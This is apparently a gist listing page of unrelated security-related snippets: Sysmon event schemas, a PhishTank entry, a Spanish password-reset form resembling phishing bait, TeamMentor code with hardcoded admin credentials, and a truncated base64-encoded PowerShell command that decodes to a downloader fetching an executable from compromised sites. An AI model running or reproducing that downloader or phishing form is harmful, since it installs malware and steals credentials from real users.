This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?xml version="1.0" ?> | |
<event name="SYSMON_FILE_CREATE_STREAM_HASH" value="15" level="Informational" template="File stream created" rulename="FileCreateStreamHash" ruledefault="include" version="2"> | |
<data name="RuleName" inType="win:UnicodeString" outType="xs:string"/> | |
<data name="UtcTime" inType="win:UnicodeString" outType="xs:string"/> | |
<data name="ProcessGuid" inType="win:GUID"/> | |
<data name="ProcessId" inType="win:UInt32" outType="win:PID"/> | |
<data name="Image" inType="win:UnicodeString" outType="xs:string"/> | |
<data name="TargetFilename" inType="win:UnicodeString" outType="xs:string"/> | |
<data name="CreationUtcTime" inType="win:UnicodeString" outType="xs:string"/> | |
<data name="Hash" inType="win:UnicodeString" outType="xs:string"/> |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?xml version="1.0" ?> | |
<event name="SYSMON_DNS_QUERY" value="22" level="Informational" template="Dns query" rulename="DnsQuery" ruledefault="exclude" version="5"> | |
<data name="RuleName" inType="win:UnicodeString" outType="xs:string"/> | |
<data name="UtcTime" inType="win:UnicodeString" outType="xs:string"/> | |
<data name="ProcessGuid" inType="win:GUID"/> | |
<data name="ProcessId" inType="win:UInt32" outType="win:PID"/> | |
<data name="QueryName" inType="win:UnicodeString" outType="xs:string"/> | |
<data name="QueryStatus" inType="win:UnicodeString" outType="xs:string"/> | |
<data name="QueryResults" inType="win:UnicodeString" outType="xs:string"/> | |
<data name="Image" inType="win:UnicodeString" outType="xs:string"/> |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
{ | |
'phish_id': '6469532', | |
'phish_detail_url': 'http://www.phishtank.com/phish_detail.php?phish_id=6469532', | |
'online': 'yes', | |
'domain': 'billgatesfunds.com' | |
'target': 'Blockchain', | |
} |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
powershell -enco JABqAHIARgBoAEEAMAA9ACcAVwBmADEAcgBIAHoAJwA7ACQAdQBVAE0ATQBMAEkAIAA9ACAAJwAyADgANAAnADsAJABpAEIAdABqADQAOQBOAD0AJwBUAGgATQBxAFcAOABzADAAJwA7ACQARgB3AGMAQQBKAHMANgA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQAdQBVAE0ATQBMAEkAKwAnAC4AZQB4AGUAJwA7ACQAUwA5AEcAegBSAHMAdABNAD0AJwBFAEYAQwB3AG4AbABHAHoAJwA7ACQAdQA4AFUAQQByADMAPQAmACgAJwBuACcAKwAnAGUAdwAnACsAJwAtAG8AYgBqAGUAYwB0ACcAKQAgAE4AZQBUAC4AdwBFAEIAQwBsAEkARQBuAHQAOwAkAHAATABqAEIAcQBJAE4ARQA9ACcAaAB0AHQAcAA6AC8ALwBiAGwAbwBjAGsAYwBoAGEAaQBuAGoAbwBiAGwAaQBzAHQALgBjAG8AbQAvAHcAcAAtAGEAZABtAGkAbgAvADAAMQA0ADAAOAAwAC8AQABoAHQAdABwAHMAOgAvAC8AdwBvAG0AZQBuAGUAbQBwAG8AdwBlAHIAbQBlAG4AdABwAGEAawBpAHMAdABhAG4ALgBjAG8AbQAvAHcAcAAtAGEAZABtAGkAbgAvAHAAYQBiAGEANQBxADUAMgAvAEAAaAB0AHQAcABzADoALwAvAGEAdABuAGkAbQBhAG4AdgBpAGwAbABhAC4AYwBvAG0ALwB3AHAALQBjAG8AbgB0AGUAbgB0AC8AMAA3ADMANwAzADUALwBAAGgAdAB0AHAAcwA6AC8ALwB5AGUAdQBxAHUAeQBuAGgAbgBoAGEAaQAuAGMAbwBtAC8AdQBwAGwAbwBhAGQALwA0ADEAOAAzADAALwBAAGgAdAB0AHAAcwA6AC8ALwBkAGUAZQBwAGkAawBhAHIAYQBpAC4 |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<form class="pure-form"> | |
<fieldset> | |
<legend>Por razones de seguridad, necesitamos que usted cambie la contraseña.</legend> | |
<input type="password" placeholder="Clave" id="password" required> | |
<input type="password" placeholder="Confirmar clave" id="confirm_password" required> | |
<button type="submit" class="pure-button pure-button-primary">Cambiar Contraseña</button> | |
</fieldset> | |
</form> |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
using System; | |
using System.Collections.Generic; | |
using System.Linq; | |
using System.Web; | |
using System.Web.Routing; | |
using System.Web.UI; | |
using System.Web.UI.WebControls; | |
using System.Xml.Linq; | |
namespace WebApplication2 |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
static void Main(string[] args) | |
{ | |
var url = "https://www.gogole.com"; | |
var result = url.IsLocalUrl(); | |
Console.WriteLine(result); | |
Console.ReadKey(); | |
} | |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
request = null | |
analytics_Service = null | |
Jade_Service = null | |
blank_credentials_message = 'Invalid Username or Password' | |
loginSuccess = 0 | |
errorMessage = "TEAM Mentor is unavailable, please contact us at " | |
class Login_Controller | |
dependencies: -> |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
using System; | |
using System.Globalization; | |
using FluentSharp.CoreLib; | |
using Microsoft.VisualStudio.TestTools.UnitTesting; | |
using System.Text.RegularExpressions; | |
namespace RegExTest | |
{ | |
[TestClass] | |
public class RegExTest | |
{ |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
var defaultServer = "http://localhost:12120"; | |
var userName ="admin"; | |
var passWord ="!!tmadmin"; | |
var path = @"C:\TM3.6\Library_Data\XmlDatabase\TM_Libraries\Lib_UNO-master"; | |
var libraryName = @"ArticlesNotInViews"; | |
var originalLibrary= @"Guidance"; | |
List<String> articleIds = new List<String>(); | |
var teamMentor = defaultServer.connectToServer(true,userName, passWord); |
NewerOlder